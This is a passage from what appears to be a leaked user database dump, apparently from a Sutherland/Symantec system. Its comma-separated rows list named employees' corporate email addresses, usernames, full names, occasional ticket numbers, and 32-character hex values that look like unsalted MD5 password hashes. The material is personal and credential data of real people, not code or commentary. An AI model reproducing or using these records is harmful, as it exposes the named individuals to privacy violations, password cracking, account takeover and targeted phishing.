8a-47de-9d08-386f7dda061c,<blank>,<blank>,AnjuS_Kumar@SUTH.COM,Sutherland,9c37f3
a0e52e4c73ab7f2bb76b904638,S,<blank>,Anju_S_Kumar,Anju,NULL,NULL,NULL
e3-4d0f-a70f-e6ebef366ac5,<blank>,<blank>,Anoop_Chandran@SUTH.COM,Sutherland,efc
f4832a3a27fc5ed7a74571cbfe937,Chandran,<blank>,Anoop_Chandran,Anoop,NULL,NULL,NU
LL
3a-41dc-be79-778deb8e04e7,<blank>,<blank>,Anoop_Joseph@SUTH.COM,Sutherland,77068
4f02d04a9fc20369f1b0f60e685,K,<blank>,Anoop_K_Joseph,Anoop,NULL,NULL,NULL
3b-4d22-a2f5-a6d712a70757,<blank>,<blank>,Anoop_Purushoothaman@SUTH.COM,Sutherla
nd,9214ffba1a16d82bf00a2485559bd027,Purushoothaman,<blank>,Anoop_Purushoothaman,
Anoop,NULL,NULL,NULL
de-4f5b-a0cb-8059ae6a3271,<blank>,<blank>,AnshumanDas_A@SUTH.COM,Sutherland,6c6e
0f78b16c2da1d9b92c6ed6bc2dc8,Das,<blank>,Anshuman_Das_A,Anshuman,NULL,NULL,NULL
b58f-420d-b81f-553c3182bae8,<blank>,<blank>,jalinder_unde@symantec.com,<blank>,f
2d7758b15071f614156e34b000abc8d,unde,<blank>,jalinder_unde,Jalinder,NULL,NULL,NU
LL
8e-404b-895d-5ee1422387ad,<blank>,<blank>,Antonio_Dsilva@SUTH.COM,Sutherland,b69
8756a04d8fc1124b8550a488d0c37,Ulysses,<blank>,Antonio_Ulysses_Dsilva,Antonio,NUL
L,NULL,NULL
1f-435b-b3ab-13f3e150dfac,<blank>,<blank>,ArchanaDevi_T@SUTH.COM,Sutherland,520a
34eaaacb12196159e791c0b66f3c,Devi,<blank>,Archana_Devi_T,Archana,NULL,NULL,NULL
fb-4b36-9cdd-dc4a57ed02fe,<blank>,<blank>,archana_shanmugan@suth.com,Sutherland,
06ae837746ca90523e10422120e270ab,S,<blank>,Archana_S,Archana,NULL,NULL,NULL
63-4588-985c-5354897c2ca0,<blank>,<blank>,Arjun_Gopinath@SUTH.COM,Sutherland,b2e
c0161058dc114fc5ff2c3729a83e1,Gopinath,<blank>,Arjun_Gopinath,Arjun,NULL,NULL,NU
LL
16-44c6-aa53-a6b794647eaf,<blank>,<blank>,Arjun_Panchal@SUTH.COM,Sutherland,6ace
ad1fd8e69fe38593613733d482e3,Navin,<blank>,Arjun_Navin_Panchal,Arjun,NULL,NULL,N
ULL
f7-4ac8-b1ef-7e9df4a32378,<blank>,<blank>,ArokiaAntoBasil_A@SUTH.COM,Sutherland,
e334bf2e358ed7e52074bec27ba82df9,Anto,<blank>,Arokia_Anto_Basil_A,Arokia,NULL,NU
LL,NULL
fc-4404-89d2-871da0d0a1ad,<blank>,<blank>,arshad_p@suth.com,Sutherland,467ecdc5f
69c5c594f144dd488c1daf0,Pookunju,<blank>,Arshad_Pookunju,Arshad,NULL,NULL,NULL
ba-4eb9-a0cd-eeeaf4e49044,<blank>,<blank>,Arun_Mulloor@SUTH.COM,Sutherland,118fd
e5a1f5043f8843b68fae2dec4bf,Mulloor,<blank>,Arun_Mulloor,Arun,NULL,NULL,NULL
cd-4b06-b8ce-3729c315c878,<blank>,<blank>,Arunraja_K@SUTH.COM,Sutherland,3574c45
b8c58e6d42c2113842324634d,K,<blank>,Arunraja_K,Arunraja,NULL,NULL,NULL
18-4eba-8d49-5c12837dcb61,<blank>,<blank>,Ashish_Shah@SUTH.COM,Sutherland,1546b6
dbd41f3073f5a0775cc7a481e9,Bhupendra,<blank>,Ashish_Bhupendra_Shah,Ashish,NULL,N
ULL,NULL
c0-4560-acc6-a8fb5e75d085,<blank>,<blank>,Ashish_Rajan@SUTH.COM,Sutherland,ec660
0e89c4893c17084f71364adf35e,P,<blank>,Ashish_P_Rajan,Ashish,NULL,NULL,NULL
6862-4a6d-9593-8b311bfdc3f1,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,e
e9d98a5860113a86fe0af68531ddb5e,ThukalilAbdulrahman,<blank>,089159,Shamsudheen,N
ULL,NULL,NULL
90-4ae7-8c0b-4984c1d17810,<blank>,<blank>,Ashish_Vinayak@suth.com,Sutherland,4d4
335996002f8c32034537736d99efa,S,<blank>,Ashish_S_P_Vinayak,Ashish,NULL,NULL,NULL
8d-429a-a8b1-a7f68b719c83,<blank>,<blank>,SSAshish@suth.com,Sutherland,37ffec73a
69d2458ed04142901d640f2,Subhash,<blank>,Ashish_Subhash_Shah,Ashish,NULL,NULL,NUL
L
815-4d61-aa2f-d06bae0c3fee,<blank>,035349,vidal_luna@symantec.com,Symantec,f1b36
9d78877b726bfcbac9b39c35d46,Luna,<blank>,vidal_luna,Vidal,NULL,NULL,NULL
4449-4ac1-bb6e-c2fb152a7c58,CRQ000000718000--vmd--03/07/2012,<blank>,divya_s1@su
th.com,sutherland,b2de2ec87496b5ca80127a9126cf39ea,S,<blank>,227373,Divya,NULL,N
ULL,NULL
d3-4688-b765-2e06362ca3c9,<blank>,<blank>,AugustineJose_RenjuKP@SUTH.COM,Sutherl
and,c19303b46c073a779b8382f4334de7d4,Jose,<blank>,Augustine_Jose_Renju_K_P,Augus
tine,NULL,NULL,NULL
88-4ad1-9fe0-8d1a91ecbc34,<blank>,<blank>,avijeet_banerjee@suth.com,Sutherland,2
236c12e147017a89d512d5f9654a8e7,Banerjee,<blank>,Avijeet_Banerjee,Avijeet,NULL,N
ULL,NULL
68-43fa-8ffd-d9eaf66364bd,<blank>,<blank>,Awadhesh_Singh@SUTH.COM,Sutherland,e26
3abfcdac715b4455e31b7b8de8fe7,Singh,<blank>,Awadhesh_Singh,Awadhesh,NULL,NULL,NU
LL
aa-4405-93fe-e5b239a7c50d,<blank>,<blank>,Ayan_Banerjee@SUTH.COM,Sutherland,07c5
da7ae896c85b430e968e1d53ac87,Banerjee,<blank>,Ayan_Banerjee,Ayan,NULL,NULL,NULL
9204-47b1-87d5-eb778022e17b,CRQ000000718008--VMD--03/07/2012,<blank>,umesh_u@SUT
H.COM,Sutherland,875993709411df5cbf3f3f836973afaf,U,<blank>,227374,Umesh,NULL,NU
LL,NULL
e7-42dc-a358-1e953b6b8e0b,<blank>,<blank>,Aravind_Sukumar@SUTH.COM,Sutherland,89
d1fc680043d70392c6495bd1c52937,Sukumar,<blank>,Aravind_Sukumar,Aravind,NULL,NULL
,NULL
06-42e7-a6d2-dd595148f329,<blank>,<blank>,Arjun_Rajan@SUTH.COM,Sutherland,58c598
126af840425023a7f9c9778206,Keshav,<blank>,Arjun_Keshav_Rajan,Arjun,NULL,NULL,NUL
L
61-4748-bdc3-a05ba58e7659,<blank>,<blank>,Aroona_K@SUTH.COM,Sutherland,e0d568a4d
1b995b2a4e7c7f1eb7aadad,K,<blank>,Aroona_K,Aroona,NULL,NULL,NULL
50-4eab-a720-60cd909edbe2,<blank>,<blank>,Arthi_Chidambaram@suth.com,Sutherland,
f1f9d900fa0b65afe68ce3413efe083b,Chidambaram,<blank>,Arthi_Chidambaram,Arthi,NUL
L,NULL,NULL
ff-400e-a86b-c62cfa1f0dc9,<blank>,<blank>,Arulprakash_J@SUTH.COM,Sutherland,5403
ebb6e10342934ee77d8c812ff602,J,<blank>,Arulprakash_J,Arulprakash,NULL,NULL,NULL
0a-4e37-923e-8c094b82e3a3,<blank>,<blank>,Arun_K2@SUTH.COM,Sutherland,b70255b5ba
c569fa6f7726df4ec31987,K,<blank>,Arun_K,Arun,NULL,NULL,NULL
8c-42f6-a870-a959a3bdd9a0,<blank>,<blank>,ashok_achary@suth.com,Sutherland,d6371
0fab322e0d48caf38eab1c86f24,Kumar,<blank>,Ashok_Kumar_Achary,Ashok,NULL,NULL,NUL
L
a2-4397-ad42-4e543760cbe6,<blank>,<blank>,AshwynDenzil_J@SUTH.COM,Sutherland,ff3
20f2fcfd175b096602d8f855fbf0e,Denzil,<blank>,Ashwyn_Denzil_Jeevaraj_Alexander,As
hwyn,NULL,NULL,NULL
6f-417a-b998-17ccdfdf62c8,<blank>,<blank>,Asmi_PA2@SUTH.COM,Sutherland,81d0f6168
2413787845a7d2fe433050f,P,<blank>,Asmi_P_A,Asmi,NULL,NULL,NULL
31-4816-abc3-2be12b7b1520,<blank>,<blank>,Athira_Nair@SUTH.COM,Sutherland,3b9c43
85857dcb0a77c1b816e9e1eb85,R,<blank>,Athira_R_Nair,Athira,NULL,NULL,NULL
38-4850-9022-1f4b18878538,<blank>,<blank>,Athullya_N@SUTH.COM,Sutherland,7f7e6b3
127ad807ed17c84400dca09cf,Raj,<blank>,Athullya_Raj_N,Athullya,NULL,NULL,NULL
61-459f-8c7e-1ed34039e2e9,<blank>,<blank>,Ranjith_AK@SUTH.COM,Sutherland,688a9eb
ae78c12faf6c14eb4b7b4e2dc,Ranjith,<blank>,Ayilamkirupagaran_Ranjith,Ayilamkirupa
garan,NULL,NULL,NULL
30-4eb7-9c70-cc2dd86783bc,<blank>,<blank>,Babu_Vijayaraj@SUTH.COM,Sutherland,d41
87d0c0c5e4674e0e2107cf13d3300,Vijayaraj,<blank>,Babu_Vijayaraj,Babu,NULL,NULL,NU
LL
f3-44ed-a7c4-91aa9e503e3b,<blank>,<blank>,Bala_Chakravarthi@SUTH.COM,Sutherland,
2ba6c8441356f7168651193c783d4b9c,Chander,<blank>,Bala_Chander_Chakravarthi,Bala,
NULL,NULL,NULL
b7-499d-8259-b2628da0014b,<blank>,<blank>,BalaMurgan_V@SUTH.COM,Sutherland,c3e0c
884e7a582ebb79f8fbe67f69aa2,Murgan,<blank>,Bala_Murgan_V,Bala,NULL,NULL,NULL
72-4203-982d-a58998c461e0,<blank>,<blank>,Balaji_J@SUTH.COM,Sutherland,e5dc796b7
f8eaaa44e53174b9bce5c3a,J,<blank>,Balaji_J,Balaji,NULL,NULL,NULL
43-47dd-9b92-3c6266b31644,<blank>,<blank>,Balasaraswathy_G@SUTH.COM,Sutherland,9
6e232d64bc3651f76fa49ab12be5837,G,<blank>,Balasaraswathy_G,Balasaraswathy,NULL,N
ULL,NULL
8b-4f98-aa2f-490c7f61e341,<blank>,<blank>,BarathKumar_k@suth.com,Sutherland,bff2
31dd52757441409c7bdf91dd4469,Kumar,<blank>,Barath_Kumar_K,Barath,NULL,NULL,NULL
be-4d8f-96c6-9a923e9153fd,<blank>,<blank>,Basil_Paul@SUTH.COM,Sutherland,f36f116
3e8b087dd6c527fab5c211bf6,Paul,<blank>,Basil_Paul,Basil,NULL,NULL,NULL
b4-42a4-aba5-1fd47ca32947,<blank>,<blank>,Beena_Albert@SUTH.COM,Sutherland,a95e8
4c86d1d8993d0167f760245a08e,Albert,<blank>,Beena_Albert,Beena,NULL,NULL,NULL
d5-4002-87d2-a7aa4015d867,<blank>,<blank>,GVAtul@suth.com,Sutherland,2c0c6e7c3c0
c510bf2ea6055c5c9878e,Valjibhai,<blank>,Atul_Valjibhai_Gohil,Atul,NULL,NULL,NULL
89-40e6-8a2e-0efc5521563a,<blank>,<blank>,Avinash_Babu@SUTH.COM,Sutherland,6a6e7
3e4d401ba66a6508c0bd68d36db,Babu,<blank>,Avinash_Babu,Avinash,NULL,NULL,NULL
b4-4fa4-a9f5-5b9e460db1f7,<blank>,<blank>,Avinash_K1@SUTH.COM,Sutherland,d198320
c2a90c070cdfbfa8fd7e3214e,K,<blank>,Avinash_K,Avinash,NULL,NULL,NULL
7b-44df-a6bc-18f642eaa1f7,<blank>,<blank>,Avinash_Nair1@SUTH.COM,Sutherland,7142
2ab99f676ce32ce0e2b2e9a8c3de,Suresh,<blank>,Avinash_Suresh_Nair,Avinash,NULL,NUL
L,NULL
19-4e2b-9407-96f33ecd0522,<blank>,<blank>,AzeethRiswan_B@SUTH.COM,Sutherland,180
a38ff483916b5c7ed5c60e91c038e,Riswan,<blank>,Azeeth_Riswan_B,Azeeth,NULL,NULL,NU
LL
7d-4986-9278-fe035b835129,<blank>,<blank>,Balajee_GR@SUTH.COM,Sutherland,9d021a1
36302219360e3d7e247caa454,G,<blank>,Balajee_G_R,Balajee,NULL,NULL,NULL
02-4d0a-ba9f-9fe1936ac98f,<blank>,<blank>,BandiArvind_Stanley@SUTH.COM,Sutherlan
d,854db56b3b84edde43eca90c3f67c204,Arvind,<blank>,Bandi_Arvind_Stanley,Bandi,NUL
L,NULL,NULL
b2-44f1-9d28-f28e98c54e1c,<blank>,<blank>,Beena_Kamath@SUTH.COM,Sutherland,c2a10
1756fab2a98b9cbe4f9d7c89286,S,<blank>,Beena_S_Kamath,Beena,NULL,NULL,NULL
57-4af8-b844-7eec00bcd5e9,<blank>,<blank>,BenHesed_AmosRobinson@suth.com,Sutherl
and,8c408773de881211ce768d32ea3398ac,Hesed,<blank>,Ben_Hesed_Amos_Robinson,Ben,N
ULL,NULL,NULL
2c-4f5b-8cae-ef220ec05797,<blank>,<blank>,Bergin_John@SUTH.COM,Sutherland,727700
083ca0f392502b87c004925bf3,Thomas,<blank>,Bergin_Thomas_John,Bergin,NULL,NULL,NU
LL
2a-4d38-82a2-365ee4d58d12,<blank>,<blank>,Bhavya_Thayyil@SUTH.COM,Sutherland,5ae
f9d5a27c6de75a1201f6f6bc81a9c,Thayyil,<blank>,Bhavya_Thayyil,Bhavya,NULL,NULL,NU
LL
37-4ab8-afe1-79bc153485c8,WS 19-07-2010,INC213497,BinduKumari_SP@SUTH.COM,Suther
land,e559f01c9821a4b558c07bcf8545ab87,Kumari,<blank>,Bindu_Kumari_Parthiban,Bind
u,NULL,NULL,NULL
50-47d8-9a78-f4c8c76810a7,<blank>,<blank>,Bindu_Shanmugam@suth.com,Sutherland,dc
32e4e629f87325dc192285997043d7,Shanmugam,<blank>,Bindu_Shanmugam,Bindu,NULL,NULL
,NULL
ba-45f0-a4d8-58bf0e5b7b73,<blank>,<blank>,Binish_James@SUTH.COM,Sutherland,d9059
91c7c3fe955afb77f7ee47ea5c6,James,<blank>,Binish_James,Binish,NULL,NULL,NULL
c7-4475-9d8e-990c83b3e343,<blank>,<blank>,Binoy_John@SUTH.COM,Sutherland,d60f185
de97feaec9b83ddccfc81ffc6,John,<blank>,Binoy_John,Binoy,NULL,NULL,NULL
68-43f2-9ca3-691cf870a01d,<blank>,<blank>,Binu_Philip1@SUTH.COM,Sutherland,8a894
8aabf00b5365275f293ff3c5d8a,Philip,<blank>,Binu_Philip,Binu,NULL,NULL,NULL
95-479d-999f-fdcac4dfe34f,<blank>,<blank>,Birendra_Pushpakar@SUTH.COM,Sutherland
,acfdb37f75c7b20a29fbc2fb58cbc86d,Jagdish,<blank>,Birendra_Jagdish_Pushpakar,Bir
endra,NULL,NULL,NULL
98-40fd-b36b-e6e558c3b806,<blank>,<blank>,Bob_Cherian@suth.com,Sutherland,f53d87
e31d555ed907454984ef4c616d,Cherian,<blank>,Bob_Cherian,Bob,NULL,NULL,NULL
ec-4bd6-b7d0-1601a2d94e7f,<blank>,<blank>,Pratap_Byalahunsi@SUTH.COM,Sutherland,
52a9b1a078d611b7e0a8f5235857cf69,Channaveerappn,<blank>,Byalahunsi_Channaveerapp
n_Pratap,Byalahunsi,NULL,NULL,NULL
fb-4866-8606-758e27fa0f18,<blank>,<blank>,Bernard_Fernandes1@SUTH.COM,Sutherland
,a0ebadb7d7f83c574390ad0cfb97fbb0,Benedicto,<blank>,Bernard_Benedicto_Fernandes,
Bernard,NULL,NULL,NULL
41-48bd-b45a-20ac5d2f5e81,<blank>,<blank>,Bhanu_Bitragunta@suth.com,Sutherland,8
750be943f25fe710403d41931cba3de,Prakash,<blank>,Bhanu_Prakash_Bitragunta,Bhanu,N
ULL,NULL,NULL
bf47-4428-9a24-f5c0df72761b,<blank>,<blank>,manju_venkiteswaran@symantec.com,Sym
antec,076a9345ff58cd714367069d075de7ba,Venkiteswaran,<blank>,manju_venkiteswaran
,Manju,NULL,NULL,NULL
dc-48c0-b539-d8945f207818,<blank>,<blank>,BharathRaja_P@suth.com,Sutherland,4477
ebf87a0a2501322a861ce18e1a33,Raja,<blank>,Bharathi_Raja_Ponnusamy,Bharathi,NULL,
NULL,NULL
2a-43fc-b63b-f5e9c62be547,<blank>,<blank>,Bharathy_V@SUTH.COM,Sutherland,aa87ffb
8b7ee7ddc3fdb7e71000ca26e,V,<blank>,Bharathy_V,Bharathy,NULL,NULL,NULL
2c-45ff-a1d9-ff0577d89d81,<blank>,<blank>,CalvinSathiyaraj_M@SUTH.COM,Sutherland
,eb624be041c623166102d28f024b4021,Sathiyaraj,<blank>,Calvin_Sathiyaraj_M,Calvin,
NULL,NULL,NULL
e3-4f9a-aa3d-dc7816b88668,<blank>,<blank>,ChaithanyaKumar_BP@SUTH.COM,Sutherland
,a9f945769bc0efab85c8cacfd00d2683,Kumar,<blank>,Chaithanya_Kumar_B_P,Chaithanya,
NULL,NULL,NULL
e0-45ec-b7d7-fcf05fd5fde5,<blank>,<blank>,Chandrahas_Manda@SUTH.COM,Sutherland,1
f9222698ebe299fd29f24b181996539,Subhash,<blank>,Chandrahas_Subhash_Manda,Chandra
has,NULL,NULL,NULL
f0-408d-a4bc-1f6ac728e686,<blank>,<blank>,Chetan_Bele@SUTH.COM,Sutherland,58937d
1724eca465fb26821489d493dd,Shriram,<blank>,Chetan_Shriram_Bele,Chetan,NULL,NULL,
NULL
c7-4bd9-a578-8d72ec2f85fd,<blank>,<blank>,Chetana_Sethi@SUTH.COM,Sutherland,9304
92a71e59731ba5ffa989c1ee865b,Ratandeep,<blank>,Chetana_Ratandeep_Sethi,Chetana,N
ULL,NULL,NULL
2a-48c4-95ac-56111c1056d4,<blank>,<blank>,Chetna_Rathod@SUTH.COM,Sutherland,8250
861a96a78c379b4167a9137faaae,Dilip,<blank>,Chetna_Dilip_Rathod,Chetna,NULL,NULL,
NULL
55-40e6-a794-3bc26856a2ce,<blank>,<blank>,Chintan_Machchhar@SUTH.COM,Sutherland,
0a07133ed9781a51476619eabd655222,Kirit,<blank>,Chintan_Kirit_Machchhar,Chintan,N
ULL,NULL,NULL
b9-4b74-9ce7-b4638f62c456,<blank>,<blank>,Chithra_CK@SUTH.COM,Sutherland,6d89c64
a7df8d10bf2022537d3743a4e,C,<blank>,Chithra_C_K,Chithra,NULL,NULL,NULL
4a-41a6-a1f1-72c93eca5df3,<blank>,<blank>,Christopher_J2@SUTH.COM,Sutherland,a17
fa9f69e515d22bfea1b866d278887,J,<blank>,Christopher_J,Christopher,NULL,NULL,NULL
4d-4edd-a09b-80be1a84f635,<blank>,<blank>,DaratheMano_J@SUTH.COM,Sutherland,288f
0c8805cb5d7dedcad9522e8d803d,Mano,<blank>,Darathe_Mano_J,Darathe,NULL,NULL,NULL
6f-4aca-a231-cd3589a4ec71,<blank>,<blank>,GSDarsha@suth.com,Sutherland,cf8779704
9f7208de2be7af134ae8201,Shyam,<blank>,Darshan_Shyam_Godbole,Darshan,NULL,NULL,NU
LL
74-45c0-af02-a21da0feebb8,<blank>,<blank>,David_R@SUTH.COM,Sutherland,6f3662710e
56497cbb43939ce29181ae,R,<blank>,David_R,David,NULL,NULL,NULL
3b-4efd-89b0-cafacc030318,<blank>,<blank>,Debon_PT@SUTH.COM,Sutherland,47aae3f55
b6a433d00e00043686de8b2,P,<blank>,Debon_P_T,Debon,NULL,NULL,NULL
20-42fb-8f8d-c70f87b7630e,<blank>,<blank>,Deepa_Venkat@SUTH.COM,Sutherland,3c1c4
eab47c3a65cbe2fb699003b086b,Venkat,<blank>,Deepa_Venkat,Deepa,NULL,NULL,NULL
a0-4d98-b15d-e07e2b26fee0,<blank>,<blank>,Deepa_Verma@SUTH.COM,Sutherland,8a6c73
de7b495915e1e69e825467ae9f,Verma,<blank>,Deepa_Verma,Deepa,NULL,NULL,NULL
cf-41af-82aa-7f4e87b67886,<blank>,<blank>,Tools_id@symantec.suth.com,Sutherland,
53378d2f44336fa623372319919162e5,Ganesh,<blank>,Deepak_Ganesh_Kannan,Deepak,NULL
,NULL,NULL
cb-44ef-8e49-0b8894479681,<blank>,<blank>,DeepakMenon_R@SUTH.COM,Sutherland,4b35
76270b40e35dc39f9030cf9adefc,Menon,<blank>,Deepak_Menon_R,Deepak,NULL,NULL,NULL
36-43fb-aed8-a353e1f3d506,<blank>,<blank>,Deepak_Sharma1@SUTH.COM,Sutherland,0c1
1fc53c5c340daaf598099ab38f357,Naresh,<blank>,Deepak_Naresh_Sharma,Deepak,NULL,NU
LL,NULL
5e-4377-8111-4c601311b56d,<blank>,<blank>,Deepthy_Shankar@SUTH.COM,Sutherland,c5
3db954f45e0c1437de60d899a4f7e9,Shankar,<blank>,Deepthy_Shankar,Deepthy,NULL,NULL
,NULL
56-41e2-a13b-70c51c997d8b,<blank>,<blank>,Bhargavi_G@SUTH.COM,Sutherland,c124b6d
2f2f8cfb9bd9eb160b90fde75,G,<blank>,Bhargavi_G,Bhargavi,NULL,NULL,NULL
4a-4948-8013-eba1a3ceacb1,<blank>,<blank>,Deepti_Krishnakumar@SUTH.COM,Sutherlan
d,da6a8a7c1e626786faaceb89e0ab0122,Krishnakumar,<blank>,Deepti_Krishnakumar_Madh
avan,Deepti,NULL,NULL,NULL
96-4f46-a38e-8c0cfe0553cd,<blank>,<blank>,Deepu_KR@SUTH.COM,Sutherland,e70a134c4
c2eb46fbd94d67379ed6ff0,K,<blank>,Deepu_K_R,Deepu,NULL,NULL,NULL
a4-4c60-a706-c4957a5188cb,<blank>,<blank>,Denny_Anson@SUTH.COM,Sutherland,72c2ea
212a774f7724353f86e3bec2c1,Thomas,<blank>,Denny_Thomas_Anson,Denny,NULL,NULL,NUL
L
13-4637-8c5a-0cf9480a6eb3,<blank>,<blank>,Devendra_Thakurani@SUTH.COM,Sutherland
,e4f47283f19bddba85c88f8d79b09ccc,Veerbhavan,<blank>,Devendra_Veerbhavan_Thakura
ni,Devendra,NULL,NULL,NULL
95-4c6e-b99b-cef1b10b4631,<blank>,<blank>,Tools_id@symantec.suth.com,Sutherland,
4c2cf4361a2da3e90650152ddf20d2e7,Sekaran,<blank>,Dhana_Sekaran_Venkatesan,Dhana,
NULL,NULL,NULL
96-4320-89f6-41baa8aa62e1,<blank>,<blank>,DhanaVenkatesh_G@SUTH.COM,Sutherland,d
77c23ece0f2a62e23b5f10809ecf974,Venkatesh,<blank>,Dhana_Venkatesh_G,Dhana,NULL,N
ULL,NULL
07-44a5-9d3b-698610235e04,<blank>,<blank>,Dhannya_Dhillan@SUTH.COM,Sutherland,d3
5b2222c43752ff5d5868b9475466f6,Dhillan,<blank>,Dhannya_Dhillan,Dhannya,NULL,NULL
,NULL
d5-4747-afc6-f4361bc352ac,<blank>,<blank>,DhilipMadhuSudhanan_U@SUTH.COM,Sutherl
and,11033d1f6bc3f955b581db0a2ba75cc5,Madhu,<blank>,Dhilip_Madhu_Sudhanan_U,Dhili
p,NULL,NULL,NULL
f0-4fde-820e-e640bca7c6a5,<blank>,<blank>,Dillip_Nanda@suth.com,Sutherland,ba036
7c773bd45a762b1bce1e0b917d4,Nanda,<blank>,Dillip_Nanda_Kumar_Kannan,Dillip,NULL,
NULL,NULL
9e-4a2e-863c-8ceb2a938f00,<blank>,<blank>,Dinesh_RS@SUTH.COM,Sutherland,d2b4d4df
ce47d252322102fd33c2aec0,RS,<blank>,Dinesh_RS,Dinesh,NULL,NULL,NULL
6f-47e2-826b-0c1a8d737294,<blank>,<blank>,Dipin_Krishnan@SUTH.COM,Sutherland,39e
acc4c4f4025d541eabd46cd7f34e9,Kumar,<blank>,Dipin_Kumar_Krishnan,Dipin,NULL,NULL
,NULL
8f-47d6-8f1d-310080d2d77b,<blank>,<blank>,Dominic_Thoppil@SUTH.COM,Sutherland,35
315464b3473d0122832a027b4f3dda,Jose,<blank>,Dominic_Jose_Thoppil,Dominic,NULL,NU
LL,NULL
f5-4414-9658-aa90f1250399,<blank>,<blank>,EbinV_Augustine@SUTH.COM,Sutherland,40
c09dcbefece507015213f2a95f3ad2,V,<blank>,Ebin_V_Augustine,Ebin,NULL,NULL,NULL
5b-4cc2-9ee8-280b7509ede4,<blank>,<blank>,eswari_a@suth.com,Sutherland,7f28a4b71
7cebe25e405bf46d6936917,Andiappan,<blank>,Eswari_Andiappan,Eswari,NULL,NULL,NULL
ff-4843-a571-a32b0acfa133,<blank>,<blank>,Faisal_Ansari@SUTH.COM,Sutherland,bb33
e7733b7518e234f3e96c7b32d133,Nadeem,<blank>,Faisal_Nadeem_Ansari,Faisal,NULL,NUL
L,NULL
4a-4989-8cdc-4e5c1fe7c796,<blank>,<blank>,Fasil_Ashraf@SUTH.COM,Sutherland,e84d0
e36aa9e6b3cf2ed603788325db0,Ashraf,<blank>,Fasil_Ashraf,Fasil,NULL,NULL,NULL
23-4c5c-a6fd-e43e1e101ec3,<blank>,<blank>,Fayis_KP@SUTH.COM,Sutherland,4b8fa8d16
67df3d8d95cff7e3db99cbe,K,<blank>,Fayis_K_P,Fayis,NULL,NULL,NULL
6e-41c0-a4ee-f5d69fa447c6,<blank>,<blank>,ambhas@suth.com,Sutherland,42b02a5369b
a428acc3824d4acf1391d,Moorthy,<blank>,Bhaskar_Moorthy,Bhaskar,NULL,NULL,NULL
14-4af7-8e7d-036d37862c1a,<blank>,<blank>,Binu_Sulaiman@SUTH.COM,Sutherland,5e94
a2d855d581e610d57f630ab5f173,Sulaiman,<blank>,Binu_Sulaiman,Binu,NULL,NULL,NULL
06-4add-bc94-32c94dcae3f0,<blank>,<blank>,Chithra_D@SUTH.COM,Sutherland,3c7baebc
6e94ed32e202cff534ec75e0,Dhakshana,<blank>,Chitra_Dhakshana_Moorthy,Chitra,NULL,
NULL,NULL
2e-44bb-a74c-1bfdb633a8f8,<blank>,<blank>,Denver_Fernandes@SUTH.COM,Sutherland,4
b2750fcb2e12f94757a8de09429a3b4,Stash,<blank>,Denver_Stash_Fernandes,Denver,NULL
,NULL,NULL
be-4283-81c4-1e9202df46eb,<blank>,<blank>,Dilip_Chari@SUTH.COM,Sutherland,03d666
dd25a5d32c345c65946698fc11,R,<blank>,Dilip_R_Chari,Dilip,NULL,NULL,NULL
6f-4206-86b4-e8a7cd066358,<blank>,<blank>,GandiPardhaSaradhi_S@SUTH.COM,Sutherla
nd,ffa6a5f8caa9e73be3d33b5ff23af03b,Pardha,<blank>,Gandi_Pardha_Saradhi_S,Gandi,
NULL,NULL,NULL
2f-407d-a1f3-bf40a29bc524,<blank>,<blank>,GaneshBabu_V@SUTH.COM,Sutherland,70417
ccab016df6555403df5155e74a2,Babu,<blank>,Ganesh_Babu_V,Ganesh,NULL,NULL,NULL
b9-48bd-a5e0-c7cb5dfa3a1d,<blank>,<blank>,Ganesh_VV@SUTH.COM,Sutherland,22ad6acd
9aa9acda2eda2d206b8b7fe5,V,<blank>,Ganesh_V_V,Ganesh,NULL,NULL,NULL
29-4eca-8c78-57dc9cfa54a4,<blank>,<blank>,gaurav_daptardar@suth.com,Sutherland,6
12f0e86bdc812e413071b803edc2615,Ajit,<blank>,Gaurav_Ajit_Daptardar,Gaurav,NULL,N
ULL,NULL
3a-49ce-b08e-eb2965f8b748,WS 16-07-2010,INC213497,Gautam_Gada@suth.com,Sutherlan
d,d83860e22f65c980737ebad8670c7fea,Ratilal,<blank>,Gautam_Ratilal_Gada,Gautam,NU
LL,NULL,NULL
4f-4fe5-a9f2-e26a20f35b29,<blank>,<blank>,George_Abraham2@SUTH.COM,Sutherland,bb
0b1db7d075fe642a7467a2ec2dcd50,Abraham,<blank>,George_Abraham,George,NULL,NULL,N
ULL
a8-4dfb-98a5-f135f8100b15,<blank>,<blank>,George_Jacob@SUTH.COM,Sutherland,3fd3b
45fc265f269cd1376790ac0459a,P,<blank>,George_P_Jacob,George,NULL,NULL,NULL
45-474d-a672-f3efa4271553,<blank>,<blank>,George_Thomas1@SUTH.COM,Sutherland,df8
79ce4652205c63828494d1483f429,Thomas,<blank>,George_Thomas,George,NULL,NULL,NULL
36-480d-84f5-e20c92e7e5d4,<blank>,<blank>,George_Varkey@SUTH.COM,Sutherland,3982
b2493913172595d67cd6ebaf9e7e,Varkey,<blank>,Georgie_Varkey,Georgie,NULL,NULL,NUL
L
8a-4e2f-b9fb-ec4e7bcbe639,<blank>,<blank>,Gibin_Joseph@SUTH.COM,Sutherland,4b64c
129e18b71a8791911447c2a1b14,Joseph,<blank>,Gibin_Joseph,Gibin,NULL,NULL,NULL
d9-48d0-ad81-40ff1c0d94a5,<blank>,<blank>,Glenn_Lobo@SUTH.COM,Sutherland,f954ef9
17e9344260e8f421328ebd01e,Ericson,<blank>,Glenn_Ericson_Lobo,Glenn,NULL,NULL,NUL
L
3c-4111-8db1-669bfb00da9f,<blank>,<blank>,Gnana_SekharJyotheeswara@SUTH.COM,Suth
erland,30336fa021ad28840f520069ebc1dfb8,Sekhar,<blank>,Gnana_Sekhar_Jyotheeswara
,Gnana,NULL,NULL,NULL
0f-46be-9906-da249d3986f2,<blank>,<blank>,GopalVenkata_V@SUTH.COM,Sutherland,5cb
f944d3e8b8ad2220d0fc7b6d73b9b,Venkata,<blank>,Gopal_Venkata_V,Gopal,NULL,NULL,NU
LL
9c-4187-8ee0-b6cd49ea23a8,<blank>,<blank>,Gopal_Naredi@SUTH.COM,Sutherland,41e61
df138a41cce1ef8bc1ac01347cf,Vinod,<blank>,Gopal_Vinod_Naredi,Gopal,NULL,NULL,NUL
L
cf-4ccb-bd37-b4e4796f0472,<blank>,<blank>,Bhavin_Maradia@SUTH.COM,Sutherland,137
b377298e8181a3bec1932bc0eb5ff,Jitendra,<blank>,Bhavin_Jitendra_Maradia,Bhavin,NU
LL,NULL,NULL
64-4ed0-821f-baebf6ff25cc,<blank>,<blank>,Bhushan_Bhoirr@SUTH.COM,Sutherland,115
